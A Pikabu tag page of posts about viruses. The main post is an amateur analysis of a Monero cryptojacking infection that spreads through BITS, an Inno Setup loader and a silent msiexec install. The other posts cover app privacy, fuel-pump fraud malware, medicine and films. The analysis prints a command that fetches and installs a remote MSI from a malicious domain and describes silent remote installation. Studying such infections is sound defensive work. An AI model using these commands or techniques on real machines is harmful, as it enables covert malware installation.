вирус

Постов: 90 Рейтинг: 180355
6053

Криптоджекинг. Разбор случайного вируса-майнера под Windows.

Развернуть

Как-то раз на неделе обратился ко мне коллега из офиса, говорит, что его домашний компьютер вдруг начинает жутко лагать, самопроизвольно перезагружается, и т.п.
Я взялся посмотреть, что же это было.
Первым делом была проверена автозагрузка процессов и служб, как обычно делает большинство "мастеров", думая, что они при отключении там чего-либо полностью излечили компьютер от вирусов. Может быть раньше, со всякими WinLocker'ами или рекламными баннерами этот трюк и прокатывал, но времена меняются, и теперь технологии другие. В винде любых версий есть старые дыры, но вполне функциональные. Итак, первое, что видно при включении ЭВМ - открывается вот такое вот окошко (скрин не было сделать возможности с него, звиняйте, скрины пойдут дальше):

Криптоджекинг. Разбор случайного вируса-майнера под Windows.

В автозагрузке, повторюсь всё в порядке:

Криптоджекинг. Разбор случайного вируса-майнера под Windows.

После того, как компьютер был штатно заштопан двумя разными антивирусами, возникла идея исследовать этот файл, который система начала загружать. Но не всё оказалось так просто.
Итак, дальше расписано по шагам, каким образом работает этот вирус, и к какому конечному результату это приводит.

Шаг 0. Попадание первичного файла в систему.
Для того, чтобы в системе MS Windows инициировался какой-либо процесс, что-то должно его запускать. В первых версиях вирусов - ярлык вируса просто кидался в папку автозагрузки программ, в Windows 7 она находится по адресу:
%USERPROFILE%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup
Потом вирусы стали добавляться в ветви реестра [HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run] и то же самое в разделе HKEY_LOCAL_MACHINE, откуда удалить их было уже не так просто. Но оказалось, что в автозагрузку эти файлы можно и не добавлять, чтобы не провоцировать простенькие антивирусы. В системе существует "Планировщик заданий" (mmc.exe), куда прекрасно можно добавить задачу автозапуска какой-либо программы, и даже целую исполняемую часть командной строки (сценарий):

Криптоджекинг. Разбор случайного вируса-майнера под Windows.

В таком случае на действия начинают реагировать лишь единицы антивирусов, никакие а**сты, макаффи и т.п. фри версии антивирей туда по большей части даже не суются.
Итак, я попытался зайти на тот адрес из окна (http://f******r.com/) в веб-браузере. Но, попробовав ввести тот адрес, да и вообще, какой бы адрес я не открывал, я получал заглушку на nginx:

Криптоджекинг. Разбор случайного вируса-майнера под Windows.

Дальше я стал копать и выяснил, что бирюзовое окно - это рабочее окно системы BITS (Background Intelligent Transfer Service). Изначально он предназначен для быстрой передачи данных по специальному протоколу через команды приложений. Как оказалось, именно этот протокол (с 2016 года, по версии xakep.ru) стал часть использоваться для загрузки вирусов. Поэтому я подключился через этот протокол, используя команды PowerShell по оригинальному адресу:

Криптоджекинг. Разбор случайного вируса-майнера под Windows.

И, вуаля, я получил какой-то файл, весом гораздо больше пустой веб-страницы:

Криптоджекинг. Разбор случайного вируса-майнера под Windows.

Видимо, на сервере специальным образом настроены порты, чтобы при обращении именно от BITS был отправлен экземпляр этого файла. При этом, как выяснилось, неважно, какое название у архива - всегда будет получен тот же файл. Давайте исследуем его.
Шаг 1: Первичный файл загружен. Что это?
Я открыл файл в Hex-редакторе, чтобы распознать тип. Начинается он с MZP, значит файл исполняемый. В файле была обнаружена сигнатура Inno Setup, стало ясно, что это - файл инсталлятора чего-либо:

Криптоджекинг. Разбор случайного вируса-майнера под Windows.

Шаг 2. Вместо установки этого файла я воспользовался утилитой Inno Unpacker, которая дала мне следующие файлы, содержащиеся внутри проекта:

Криптоджекинг. Разбор случайного вируса-майнера под Windows.

Собственно, как оказалось, программа никаких файлов в себе не содержала - только скрипт install_script с описанием установщика, а так же скомпилированный фрагмент кода, выполненного на паскале. Вот файл скрипта:

Криптоджекинг. Разбор случайного вируса-майнера под Windows.

Обратите внимание на параметры [Setup], а именно название программы, и выходное имя файла OutputBasenameFile (оно совпадает кое с чем на первой картинке).
Шаг 3. Также неизвестным оставался код программы CompiledCode.bin. Для того, чтобы расшифровать его, я воспользовался декомпилятором паскаль-фрагмента кода:

Криптоджекинг. Разбор случайного вируса-майнера под Windows.

Шаг 4. Стало ясно, что данные внутри кода немного зашифрованы (обфусцированы) от посторонних глаз. Немного видоизменив код, я интерпретировал его на FreePascal'е, и получил следующий результат:

Криптоджекинг. Разбор случайного вируса-майнера под Windows.
Криптоджекинг. Разбор случайного вируса-майнера под Windows.

Собственно, здесь можно видеть копии команд, выполняемых в Windows через cmd shell. Здесь указана команда на мгновенную перезагрузку (скорее всего, отключает антивирус: во время выключения все программы закрываются, но сам код успевает исполнится, таким образом простые антивирусы не обнаружат загрузки кода). Зачем предназначена 5 строка (пингует локалхост), я точно не знаю - скорее всего это какие-то внутренние операции для работы вируса. Программа также передаёт на сервер данные о системе, её разрядности, производительности и т.п. отдельным потоком, это можно видеть в коде, но эту часть я вырезал из-за сложности интерпретации.
Подробно нас интересует четвертая строчка: что такое msiexec?
Шаг 5. Загрузка главного инсталлятора. Распаковка.
Для тех, кто слышит об этом в первый раз - да, не удивляйтесь. Вбив в командную строку такую команду: msiexec.exe /q /i (веб-адрес), начнется немедленная, скрытая и невидимая установка исполняемого кода с удаленного адреса в систему, если инсталлятор и скрипт собран в формате msi. Файл может даже не иметь сертификата подписи. В файле могут исполняться любые команды по созданию, перемещению, переименованию файлов внутри системы, добавления их в реестр и запуск. Зачем это было добавлено? Именно через эту подпрограмму система загружает обновления. Ничего не мешает закинуть туда свои скрипты и файлы.
Ситуация такая же, как и с первым файлом - если открыть этот сайт по http, он выдаёт заглушку массой в 233 байта. Если же обратиться по любому адресу через msiexec, то сервер посылает очередной архив, весом в 2,9 Мб. Скорее всего, это вызвано определенным использование портов и специальных команд системы. Но сайт в этот раз уже другой. Это может быть одно из сотен зеркал, все настроены одинаково - обратившись по новому домену через оригинальный BITS я получил файл, весом в 328 Кб, т.е. файл с паскалем. И наоборот.
Давайте посмотрим, что внутри инсталлятора, для этого распакуем его при помощи 7-zip как обычный архив:

Криптоджекинг. Разбор случайного вируса-майнера под Windows.

Внутри инсталлятора (MSICEE2.msi) оказались два файла: unzip.exe и vcruntime140.lib.zip. Во втором архиве ещё два файла, но он запаролен. Для начала я исследовал файл unzip.exe:

Криптоджекинг. Разбор случайного вируса-майнера под Windows.

Оказалось, что этот файл является неизмененной копией утилиты для систем Windows 2005 года, которая называется "Info-Zip UnZip", и являющейся простым распаковщиком zip-файлов. Вот, что будет, если её запустить:

Криптоджекинг. Разбор случайного вируса-майнера под Windows.

Несмотря на древность, применение этой утилиты здесь оправдано, далее расскажу, почему именно. Итак, осмотрев файлы мы зашли в тупик - что делать? Программа изучена, а второй архив запаролен. Но при помощи архиватора 7-zip мы не смогли извлечь установочный скрипт из MSI-файла. Пришлось запустить этот инсталлятор на виртуальной машине с логгированием: такой командой: msiexec.exe /i http://revir.i********s.info/yskwozrivwuwc.txt /L*V log.txt
После чего из машины был вытащен лог установки, размером в 140кб. Пройдусь по его ключевым моментам:

Криптоджекинг. Разбор случайного вируса-майнера под Windows.

Шаг 6. В одной из строчек виден пароль от архива: IBM644. Но обычный архиватор этот пароль не принимает - распаковываются файлы только оригинальным UnZip'ом при помощи этой команды.
Все файлы внутри архива - исполняемые библиотеки для системы типа dll или lib. Написаны они на C, декомпилировать их я смысла не видел. Возможно, именно в них содержится блок, занимающийся копированием вируса в системе, но так глубоко я их не копал. В песочнице после их регистрации в системе (папка TEMP) появился следующий файл: [612A9A]. Смотрим, что у него внутри:

Криптоджекинг. Разбор случайного вируса-майнера под Windows.

Этот файл представляет собой json - конфиг, в котором видно ключевое слово CryptoNight и URL, логин и пароль от майнинг-сервера. Данный майнер майнит монету "Monero". Данный файл подозрительно совпадает с конфиг-файлом для Windows-версии майнера "****Rig":

Криптоджекинг. Разбор случайного вируса-майнера под Windows.

Скормив этот конфиг исполняемому файлу майнера (оконной версии), загруженному из интернета, действительно компьютер получил настоящую "работу", и видео при этом стало жутко лагать. В оригинальном конфиге прописано также исполнение без gui (фоновым процессом - никаких окон).

Криптоджекинг. Разбор случайного вируса-майнера под Windows.

Собственно, это и есть конечный результат. Помайнил 10 секунд для него, чтобы сделать вам скрин, надеюсь, что вырученных за это время денег автору хватит как минимум на два билета до Канарских островов. Итого имеем сложный файл, прописывающий себя в нескольких местах системы, работающий на языках Pascal и C++, в итоге приводящий к запланированному запуску майнера. Берегите свои компьютеры. С вами был Kekovsky, специально для pikabu.

552

Get Contact - ставим трояны на свои смартфоны добровольно...

Развернуть
Сейчас в России огромной взрывной популярностью пользуется приложение GET CONTACT, которое, при установке, покажет, как вы записаны у других людей в записной книжке смартфона. Огромное количество рекламы сервиса в соцсетях, фейсбук уже второй день завален огромным количеством скриншотов из приложения. И вот, что можно сказать...
Get Contact - ставим трояны на свои смартфоны добровольно...
Можно сейчас искать людей, выкладывающих скриншоты из приложения и предлагать им любой развод. Поведутся. Только не забудьте в конце приложить какой-нибудь бонус смешной или интересный за действие.

Приложение Get Contact уже успели запретить в Казахстане и Азербайджане, из-за нарушения закона «О персональных данных и их защите». Проблема в том, что это настоящий добровольно устанавливаемый троян, Который собирает с вашего смартфона, с вашего же разрешения, всю информацию, и передает ее третьим лицам. Для самых догадливых: не только то, как смешно или оскорбительно вы записываете в телефонной книге разных людей.

Смотрели серию южного парка про человеческую многоножку от Apple?
Get Contact - ставим трояны на свои смартфоны добровольно...
Вот и здесь, стоило хотя бы обратить внимание (пользователям андроид), какие разрешения вы даете приложению. Или почитать условия использования:

"GET CONTACT may share any personal and/or corporate information and date submitted electronically to GET CONTACT by the users with any third party. GET CONTACT may send newsletters through email messages, SMS or contact over the phone or perform marketing activities as allowed by the law and collect data from such communication activities through various tools and methods for statistical purposes. GET CONTACT may share the personal/corporate data and information submitted to it and also cooperate with third parties for the collection of such data/information; perform sales and allow them to be used. GET CONTACT may share the data collected from the users over 3rd party applications and obtain data from 3rd party applications in order to sustain and expand its services. Such data may contain phone books, contacts, social media accounts, photos, email addresses, İP addresses as well as call records."

Это лишь выдержка, с полной версией ,где всё еще веселее, можно ознакомиться по ссылке: https://www.getcontact.com/help/privacy

Кто не спик инглиш вэлл, поясню, что приложение собирает информацию с устройства пользователя, и далее может рассылать email, SMS пользователям с использованием любого стороннего приложения (т.е, условно, запустить со смартфона вашу почту и начать активно спамить и рассылать трояны от вашего имени вашим друзьям). Также приложение может делиться с любыми третьими сторонами собранной информацией. Включая имена и номера телефонов, аккаунты соцсетей, фотографии, почты, IP адреса и записи телефонных разговоров.

Ну что, у вас всё еще есть желание узнать, как вы записаны в телефонных книжках ваших друзей и коллег? Самое обидное, что, устанавливая это приложение, вы ставите под угрозу и передаете все свои личные данные третьим лицам, это одно, но еще и ставите под угрозу всех, с кем контактируете через смартфон, включая друзей в соцсетях и, конечно, ваших контактов из телефонной книги. Т.к они также попадают в спам-базы, которые в дальнейшем будут использоваться по назначению.
3443

ФСБ выявила масштабную аферу по недоливу бензина на заправках с помощью вируса

Развернуть
Водители недополучали до 7% бензина — это затронуло десятки заправок.

ФСБ начала расследование дела о масштабной афере на десятках российских заправок, где водителям не доливали бензин. По данным «Росбалта», злоумышленники использовали вирус, с помощью которого скрывали недолив топлива от клиентов.

Как отметило агентство, программу создал житель Ставропольского края Денис Заев, который продавал её руководству заправок и входил в «долю» с хищений. Заева задержали и поместили под стражу, его обвиняют по статьям 159 и 273 УК РФ (создание вредоносных программ и мошенничество).

Вирусы устанавливали в программное обеспечение колонок и внутрь системы: технологические проливы, кассовый учёт, суммарные счётчики. Афера затронула «почти всю южную часть России»: Ставропольский, Краснодарский край, республики Северного Кавказа, Адыгею, Калмыкию.

Вирус Заева не могли вычислить службы контроля нефтяных компаний и сотрудники контрольно-кассового учёта, добавил «Росбалт». Расследование усложняло то, что владельцы заправок не несли потерь, а никто из водителей не замечал недолива и не обращался в полицию. Если бы это заметили полицейские, то нехватка двух-трёх литров бензина не смогла бы стать основой для уголовного дела.
ФСБ выявила масштабную аферу по недоливу бензина на заправках с помощью вируса
Вспомнился этот пост.

Источник новости: ссылка
487

Барри Маршал: "Все были против меня, но я знал, что прав"

Развернуть
Барри Маршал:
Барри Джеймс Маршалл ( англ.Barry James Marshall, 30 сентября 1951, Калгурли, Западная Австралия) - австралийский доктор, лауреат Нобелевской премии по физиологии и медицине 2005 года, кавалер ордена Австралии. Профессор клинической микробиологии Университета Западной Австралии. Впервые показал, что язва желудка в большинстве случаев вызывается бактерией Helicobacter pylori. Это опровергло старую медицинскую доктрину о роли стресса, острой пищи и повышенной кислотности в этиологии язвы.
В 1979 году Маршалл начал работу в Королевском госпитале Перта, где в 1981 году он встретился с Робином Уорреном, который был тогда старшим патологом в госпитале и интересовался недавно открытой им бактерией Helicobacter pylori. Вдвоем они начали исследование этой бактерии и их связи с гастритом. В 1982 году они выделили первичную культуру H. pylori у больного и выдвинули гипотезу о том, что эта бактерия вызывает язву и рак желудка. Однако, это предположение было встречено недоверием в медицинском и научном сообществах. Позже в 1998 году Маршалл говорил: "Все были против меня, но я знал, что прав"
После того, как эксперименты по заражению лабораторных свиней не удались, в 1984 году Маршалл сам выпил культуру бактерии, выделенную от больного, и вскоре у него развились симптомы гастрита с ахлоргидрией: желудочный дискомфорт, тошнота, рвота и специфический запах изо рта (галитоза). На 14-й день после инфицирования биопсия не показала наличия бактерий в желудке. Возможно, неспецифический иммунитет сам справился с инфекцией. Это заболевание и выздоровление доказало согласно постулатами Коха, что H. pylori вызывает гастрит. Две статьи с описанием эксперимента были опубликованы в журнале Medical Journal of Australia.
После этого Маршалл работал в Королевском госпитале Перта (1985-1986), затем в Университете Вирджинии ( США, 1986-1996). Позже вернулся в Университет Западной Австралии, где работал в течение 1998-2003 годов.
2005 году Барри Маршалл и его коллега Робин Уоррен получили Нобелевскую премию по физиологии и медицине "За работы по изучению влияния бактерии Helicobacter pylori на возникновение гастрита и язвы желудка и двенадцатиперстной кишки".

Маршалл продолжает работать в исследовательской лаборатории H.pylori университета в области, связанной с исследованиями этой бактерии.
3052

Против ВИЧ оказался эффективен другой вирус

Развернуть
Используя вирус уничтожить другой вирус.
Ученые Оттавского университета совместно с врачами местного госпиталя обнаружили, что вирус Мараба, также известный как MG1, эффективно борется с ВИЧ-инфицированными клетками, сообщает EurekAlert!.

Специалисты рассчитывают, что данное открытие поможет в будущем создать лекарства против вируса иммунодефицита.
Против ВИЧ оказался эффективен другой вирус
Прием антиретровирусных препаратов помогает держать ВИЧ под относительным контролем. Однако это не дает возможности убить вирус, потому как он слишком незаметен для лекарств.

Зато MG1 «видит» ВИЧ-инфицированные клетки.

Ранее было установлено, что Мараба способен атаковать пораженные раком клетки, которые имеют дефекты синтеза интерферона. При этом, он не трогает здоровые клетки.

Доктор Анхель и его команда ранее обнаружили, что ВИЧ-инфицированные клетки также имеют дефекты синтеза интерферона.

В рамках эксперимента специалисты попробовали использовать MG1 против ВИЧ. Идея оказалась удачной — вирус определял зараженные клетки и нападал на них, сокращая их количество, и оставил здоровые клетки целыми и невредимыми.

Врачи добавили MG1 в образец крови с ВИЧ: присутствие вируса осталось, но его стало в разы меньше.

Причины агрессии вируса Мараба против зараженных ВИЧ клеток ученые пока объяснить не могут. Есть предположение, что MG1 реагирует на дефекты синтеза интерферона в клетках.

Этот вопрос нуждается в дальнейшем изучении.

Источник: http://quibbll.com/70395-protiv-vich-okazalsya-effektiven-dr...
6187

Неожиданный вопрос на собеседовании.

Развернуть

(Hr) - Представьте, что началась эпидемия нового неизвестного вируса. Распространяется вирус половым путем ...
(Кандидат) - (не давая договорить) - Я точно выживу.
Неожиданный вопрос на собеседовании.
960

Как мегафон вместо детализации вирусы от mail.ru присылал

Развернуть
Одним чудесным вечером я решил разобраться в своих расходах и куда уходят деньги, в том числе и заказать детализацию счета. Зашел в ЛК мегафона, заказал на свою почту и приходит мне письмо с html вложением
Как мегафон вместо детализации вирусы от mail.ru присылал
Нажимаю я на него, и знаете что мне предлагают сделать при переходе по ссылке? Скачать archive-55-965.zip в котором лежит exe файл с таким же именем. Мое кольцо среагировало.
Как мегафон вместо детализации вирусы от mail.ru присылал
Но потом я подумал, не может же оператор мне вирусню присылать, наверняка это какое-нибудь их приложение....
Как мегафон вместо детализации вирусы от mail.ru присылал
Эта тварь начала после запуска без каких либо уведомлений распихивать приложения и расширения mail.ru по всем углам компа, благо я уже наученный горьким опытом быстро все почистил и локализовал.
Я подумал, что это ошибка, но повторный заказ детализации во вложении имел такую же ссылку, качать не стал.

Сразу же написал в поддержку мегафона и приложил файл, ответили почти мгновенно, но конкретики не дали, "будут разбираться".
Как мегафон вместо детализации вирусы от mail.ru присылал
Варианта два, либо кто-то поимел сайт мегафона, что вполне вероятно, либо Алишер и тут без вазелина влез.
Будьте осторожней! Всем добра. БМ ругался на картинки.
4179

Вирусы от робота

Развернуть
Вирусы от робота
300

Жизнь с вирусом Эпштейна-Барр (EBV)

Развернуть
В связи с постом массажиста и комментариями к нему, я решил написать кулстори от первого лица — каково это жить с EBV.

Итак, сперва я вкратце опишу симптомы, которые у меня сейчас присутствуют, потому что если бы я наткнулся на подобный пост с описанием симптомов сам, это могло бы мне помочь и я не ломал голову над тем, что со мной вообще происходит:

*Синдром хронической усталости (СХУ) — я никогда не высыпаюсь, если я много сплю, то когда просыпаюсь, по прежнему хочу спать, просто чуть меньше.
*Потливость — я стал очень сильно потеть без объективных причин.
*Туман в голове (Brain fog) — Мне стало намного сложнее формулировать мысли, проводить в уме операции с числами, решать задачи. На этом симптоме я остановлюсь подробнее позже. Для примера, мне с трудом дается писать этот пост.
*Невнимательность — Я стал гораздо менее внимательным, отчасти это относится к туману в голове. Порой я не замечаю элементарных вещей.
*Отсутствие желания что-то делать, инициативы — Если желание что-то сделать ненадолго появляется, то довольно быстро исчезает.

Это не полный список симптомов, однако именно они были одними из первых и помогли бы мне диагностировать EBV раньше. Вот более специфичные, они появились позже:

*Нарушенный пищеварительный тракт
*Воспаленные лимфоузлы
*Простужаться стал чаще
*Высокая температура при простуде (38-39)
*Повышенное слюноотделение
*Сыпь на теле после душа
*Ломящая боль в спине, суставах
*Периодически: Тремор, проблемы со сном

Предостережение для ипохондриков: не стоит из-за одного симптома ставить себе диагнозы. EBV определяется анализами, а не постами на пикабу.

Вкратце про заражение: Вирус передается воздушно-капельным путем, т.е. порой достаточно поговорить с человеком или попить из одного стакана.
Вкратце про лечение: его нет.

Расскажу, как все происходило со мной в порядке, который мне кажется хронологическим.
Однажды, когда мне было 10-12 лет я проснулся утром и понял, что со мной что-то не так: у меня в голове появился какой-то туман. Я не знаю, как описать это ощущение людям, у которых его нет, но попробую: В голове состояние, близкое к пустоте: ваш мозг будто завешен пеленой. Для того, чтобы совершить минимальное мозговое усилие вам необходимо
концентрироваться, вспоминать что-то: например, зачем вы вообще это делаете и как это лучше сделать, как вы делали это раньше. Иногда надо что-то быстрое и конкретное сказать
кому-то в ответ, а вы не можете: вроде и понимаете, что примерно нужно сказать, а как доходит до конкретики и формулировок, в голове пустота. Мысли разбегаются, и необходимо концентрироваться, ловить каждую по отдельности, другим мозговым усилием соединять их воедино чтобы в конце концов что-то проблеять. Таким образом, быстрая сообразительность — это не про меня. Вы можете быстро соображать абстрактно — т.е. импульс, абстрактная мысль рождаются в мозге моментально, но какое-то конкретное действие, например, остроумная шутка или ответ — это мимо, т.к. чтобы преобразовать абстрактное в конкретное, нужно мозговое усилие. Лично у меня тогда сложилось ощущение, будто кто-то заблокировал мне 10-15% моего мозгового ресурса. То есть, я отчетливо понимал, что я не дебил, т.к. еще вчера я себя прекрасно чувствовал и у меня не было никаких сомнений в мозговой деятельности, а сегодня в голове пелена. Часть ресурсов мозга оказалось мне больше недоступна и я стал на 10-15% тупее во всем: начал дольше соображать, хуже формулировать мысли, хуже обучаться, хуже считать. Это не прошло ни после того, как я поспал, ни через месяц, ни через год. Сейчас, конечно, хуже, но я еще припоминаю, как здорово было иметь ясный и чистый ум: разум был моим верным другом и я всегда мог рассчитывать на него и никогда в нем не сомневался.
Жизнь с вирусом Эпштейна-Барр (EBV)
Сейчас мне 26 лет. С того утра и до 24 лет я отмечал за собой, что понемногу тупею, примерно на 0,5-1% в год. Так же, начала подводить память, все серьезнее и серьезнее. Как оказалось, это все было терпимо. В 25 лет я расстался с девушкой, мы встречались около 2 лет. Расставание мне далось очень тяжело, а серьезные проблемы родителей, которые начались параллельно нашему расставанию довели меня до истерики: я не находил себе места, я был подавлен, разъярен, выпотрошен, вывернут наизнанку и невероятно переживал. Я действительно ужасно себя чувствовал. Чего уж скрывать, были и бессонные ночи и сопли и все, чем сопровождается разрыв серьезных отношений (если вы дорожите ими). Примерно в тот период я простыл. Да как-то так простыл, что сопли текли рекой, а температура была аномально высокой, раньше такого никогда не было. И после того, как симптомы простуды прошли, я понял, что моя мозговая активность упала еще сильнее. Сейчас я понимаю: из-за сильного стресса я мог пошатнуть иммунную систему и это способствовало развитию EBV. Практически сразу появились специфичные симптомы (описаны выше). Сейчас я представляю из себя концентрацию тупизны и очень хорошо понимаю людей, которых когда-то называл тупыми сам. Вроде что-то знаю, но ужасно медленно соображаю и считаю. У меня есть знакомые, чей разум чист и ясен — прекрасные ребята, быстро соображают и во многом достигают успеха. Когда я ловлю себя на мысли, что мог бы быть таким же, становится очень горько и хочется повеситься. Так же, я отмечаю, что по прежнему тупею и теряю память. Субъективно, темп отупения увеличился. Иногда, когда мое сознание находится в неестественном состоянии, (например, когда я пьян или долго не спал) мне удается получить ключик к воротам Эдемского сада: сообразительность становится быстрой, идеи вылетают из головы и попадают в точку, нужные фразы формулируются сами, только успевай снимать с языка и я понимаю: вот он я, каким я себя еще хоть сколько-нибудь помню до того, как заболел. А затем это все растворяется, будто ничего и не было. Чистый разум, подразнив меня, исчезает, как мираж и на мозг снова опускается пелена. Так я существую.

Диагностике вируса поспособствовало появление специфичных симптомов. До этого я подозревал, что у меня как-то проявляется какое-то психоневрологическое заболевание.

Курс лечения, выписанный доктором мне никак не помог, хотя обошелся довольно дорого. Русскоязычный форум, посвященный EBV не дает ответов ни на какие вопросы: у каждого пользователя своя правда, они сами во всем разбираются намного лучше докторов, в пору ученую степень получать, а излечиваются, как я понимаю случайно: вирус по какой-то, невыясненной мной закономерности капитулирует сам.

P. S. Как мне кажется, я был бы готов смириться со многими перечисленными мной симптомами, лишь бы вернуть ясность ума.

P. P. S. Если кто-то знает хороших докторов в Московском регионе — пожалуйста, пишите о них, с меня плюсики.
767

Опасные вирусные инфекции в кино. Мифы и реальность.

Развернуть
Для сегодняшнего рассмотрения и обсуждения я отобрал 4 фильма и 1 сериал. Вот они:
1. Заражение. 2011
2. Вирус. 2013
3. Эпидемия. 1995
4. Обитель Зла. 2002
5. Доктор Хаус (1 сезон, 4 серия «Материнство»)
В этом разборе мне оказал огромную помощь Сергей – научный сотрудник НИИ по борьбе с особо опасными инфекциями. Для удобства изложения я буду писать от первого лица, выделяя реплики Сергея отдельными вставками.
Опасные вирусные инфекции в кино. Мифы и реальность.
Итак, мы пойдем по пунктам, рассматривая в каждом все 5 фильмов по тому или иному признаку.
1. Возникновение возбудителя.
Во всех фильмах возбудителем смертельной инфекции является вирус. Во всех фильмах у вируса существует реальный прототип.

Итак, «Обитель Зла» – вирус бешенства. «Эпидемия» - вирус Эбола, «Заражение» - описан паромиксовирус. «Вирус» - вирус гриппа, «Доктор Хаус» - эховирус.
В первых четырех фильмах показан новый вид вируса, в сериале «Доктор Хаус» показан реально существующий вирус, по этому вопрос возникновения в этом фильме не ставится.
Рассмотрим остальные. В 2 фильмах «Эпидемия» и «Обитель Зла» - смертельный вирус создается как микробиологическое оружие массового поражения. Комментарий Сергея по этому поводу:

«Я считаю, что модифицировать вирус для применения в качестве оружия возможно, но по целому ряду причин это достаточно бессмысленно. Вот основные из этих причин:
1. Геномодифицировать вирусы гораздо сложнее и дороже чем бактерии. Соответственно при существенно больших затратах результата можно так и не достичь.
2. Вирусы гораздо менее устойчивы во внешней среде. Это серьезно затрудняет хранение и доставку боеприпасов снаряженных этим оружием до противника. Если бактерии в виде спор могут хранится достаточно долго. Ими можно начинить боеголовку и спокойно хранить до пуска, то вирусы такими свойствами не обладают.
Таким образом я считаю маловероятным сценарий с разработкой вируса в качестве оружия массового поражения»

В фильме «Заражение» и «Вирус» происходит естественная мутация существующих вирусов с появлением нового вида. Характерная особенность, это происходит в Китае в обоих фильмах. Действительно по ряду причин нередко новые штаммы возбудителей обнаруживаются именно в этом регионе. Одной из немаловажных причин этого – высокая плотность населения. Сергей согласился с моим мнением о том, что подобный сценарий возникновения возбудителя наиболее вероятен.

2. Распространение возбудителя.

В фильме «Обитель зла» возбудитель распространяется вполне реалистично, копируя распространение вируса бешенства, серьезные отличия только в патогенезе. Сам же процесс построен по канонам фильмов жанра «Зомби-Апокалипсис».
В фильме Доктор Хаус – распространение вызвано халатностью сотрудников больницы и нарушением санитарных норм. По мнению Сергея – для простого обывателя это наиболее вероятный путь столкнуться с опасной инфекцией (не обязательно в больнице, а вообще, практически любая локальная вспышка – чья-то халатность).
В фильме «Эпидемия» - распространению вируса способствует злой умысел ряда персонажей.
В фильмах «Заражение» и «Вирус» распространение происходит вполне естественным путем, через места массовых скоплений людей.
Важный момент отмеченный Сергеем для трех последних фильмов:

« Для большинства возбудителей, как вирусов так и бактерий, контакт зараженного организма с восприимчивым организмом совсем не гарантирует заражение. Вероятность подобного развития событий различна для разных возбудителей. Но всегда есть определенная «минимальная заражающая доза». То есть то количество клеток или вирусных частиц которое должно попасть в организм для развития заболевания (у всех по-разному может быть 100 клеток, может быть 1000. Интересный факт, у некоторых штаммов туляремии достаточно 1 клетки для заражения, но это редкость). Плюс в организме существует множество защитных механизмов, так или иначе затрудняющих заражение. Вирусам в этом отношении особенно сложно, они облигатные паразиты им для эффективного развития нужно попасть в клетку-мишень, в отличии от бактерий они не могут переждать во внешней среде. Таким образом, чрезвычайно высокий процент заражения в общественных местах – скорее миф.»

3. Патогенез развития заболевания.

«Обитель зла» - совершенно не реалистичен. Не стоит даже всерьез обсуждать. Хотя бешенство придает на последних стадиях ряд интересных черт организму, тем не менее ни один вирус никоим образом не сможет оживлять мертвых.
«Эпидемия» - в общих чертах патогенез скопирован с лихорадки Эбола. Существенное отличие – воздушно-капельный путь распространения и скорость развития заболевания, а также смертность близкая к 100% (гораздо быстрее чем в жизни)
«Вирус» - скопирован патогенез гриппа «испанка». Серьезнее отличия в высокой скорости развития заболевания и высокой летальности возбудителя (у настоящей испанки летальность была порядка 20%)
«Заражение» - патогенез так же сходный с гриппом «испанка». Так же высокая скорость развития заболевания. Но реализма больше – есть скрытый период развития заболевания, а также есть выжившие естественным путем, то есть смертность не 100%.
«Доктор Хаус» - вполне реалистичный патогенез развития вируса, не слишком быстрый, что позволяет героям сериала найти эффективный метод лечения.
Важные замечания от Сергея:

« В эволюционном плане всегда побеждают не смертельные возбудители. Это верно для всех видов микроорганизмов. Тело человека – дом для микроорганизма. Заселившись в новый дом плохие жильцы могут гадить в нем и портить. Но поджигать дом сразу- бессмысленно, ты и сам погибнешь. Я могу привести пример холеры. Ранее существовал так называемый классический штамм холеры – довольно смертельный. Но в течении 20 века он был вытеснен гораздо менее опасным биоваром «Эльтор». То есть эволюционно у него гораздо больше перспектив, он более приспособлен. Именно поэтому, я считаю ныне существующие штаммы гриппа гораздо менее опасны чем «испанка». И по поводу скорости развития заболевания. Любому возбудителю выгодно как можно дольше быть в организме в скрытом состоянии и выделятся во внешнюю среду естественным путем. Поэтому все возбудители эволюционно так или иначе приспосабливаются к продлению этого скрытого периода. Что конечно не устраивает режиссеров, поэтому клинические признаки заболевания в кино проявляются сразу и в полном объеме»

4. Действие властей и эпидемиологов.

«Обитель Зла» - из реалистичных моментов – только попытки организации карантина.
«Вирус» и «Эпидемия» - на фоне красивых картинок с защитными костюмами разворачиваются совершенно идиотские действия властей и эпидемиологов. Характерный момент стрельба в мирных жителей и попытка решить проблему с помощью бомбардировки очага заражения. Эпидемиологи не лучше, в обоих фильмах ищут некого единственного носителя «спасительных антител» из крови которого создают некую чудо вакцину-сыворотку (на самом деле два совершенно разных типа препаратов) с помощью которого всех спасают в кратчайшие сроки.
«Заражение» и «Доктор Хаус» - наиболее реалистичный подход. Врачи решают в первую очередь задачи диагностики и изучения свойств возбудителя. Затем побеждают болезнь с помощью планомерной кропотливой работы. Особенно хорошо это показано в «Заражении», где для создания вакцины потребовалось много времени и спасать она не может, может только защитить не заболевших.
Комментарий Сергея по этому пункту:

«Ни одну эпидемию не победить бомбардировками. Только разрушится инфраструктура, возникнет хаос, из-за чего носители разбегутся еще больше. Успешная работа врачей на первом этапе – сбор информации. Как говорил мой учитель – «С по-настоящему опасным заболеванием вы впервые встретитесь в морге». Выделение возбудителя, его идентификация и типирование – долгий и сложный процесс, требующий усилия множества специалистов по отбору проб (это неплохо показано в сериале «Доктор Хаус» там для поиска возбудителя на довольно небольшой территории мобилизуют десятки людей). После установления возбудителя – важнейший момент – правильное организация карантинных мероприятий. И тут уже очень важны правильные действия властей. Чем более эффективно работают государственные органы, тем быстрее удастся остановить распространение болезни. Приведу пример с вирусом Эбола. В Африке эпидемия развернулась на территории нескольких стран, но там где был ниже уровень коррупции, карантинные меры были гораздо более действенны, и вспышки удалось быстрее локализовать ( просто никто не мог за взятку преодолевать карантинный кордон и этого было уже достаточно, для нормализации ситуации).»

Некий общий итог всего эфира.
Фильмы произведения искусства – во всех из описанных режиссеры хотят донести разные мысли и во всех случаях – заболевания только красочный фон, по этому создатели фильмов в разной степени пренебрегают достоверностью и создают мифы сами того не ведая. В целом можно сказать, что в фильмах все показано опаснее и страшнее, чем бывает на самом деле.
Комментарий Сергея:

